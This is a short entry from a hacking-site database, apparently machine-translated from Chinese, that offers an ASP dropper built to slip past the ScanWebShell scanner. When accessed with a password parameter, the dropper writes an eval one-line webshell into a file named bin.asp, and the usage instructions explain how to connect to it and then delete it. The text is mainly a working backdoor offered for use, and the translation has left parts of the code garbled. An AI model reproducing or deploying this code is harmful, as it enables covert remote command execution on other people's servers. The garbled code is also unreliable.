Dodge ScanWebShell the little things-vulnerability warning-the black bar safety net

ID MYHACK58:62200714771
Type myhack58
Reporter 佚名
Modified 2007-03-29T00:00:00


Method of use: Direct access to the xxx. asp? bin=zs will be in the current directory to generate a bin. asp. The connection password for the zs! PS: the file can Dodge ScanWebShell,but the generated bin. asp will be killed,after use please delete the bin. asp!

<% pass="zs" If request("bin")= pass then shell = "bin. asp" Connstr="Provider=Microsoft. Jet. OLEDB. 4. 0;Data Source="&Server. MapPath(shell) set connad=server. createobject("adox. catalog") connad. create connstr Set conn=server. createobject("Adodb. Connection") conn. open connstr conn. execute("create table cmd(a shell text)") conn. execute("insert into cmd (the shell) values ('<"&Chr("3 7")&"e"&"val+request("""&pass&""")"&chr("3 7")&">')") End If %>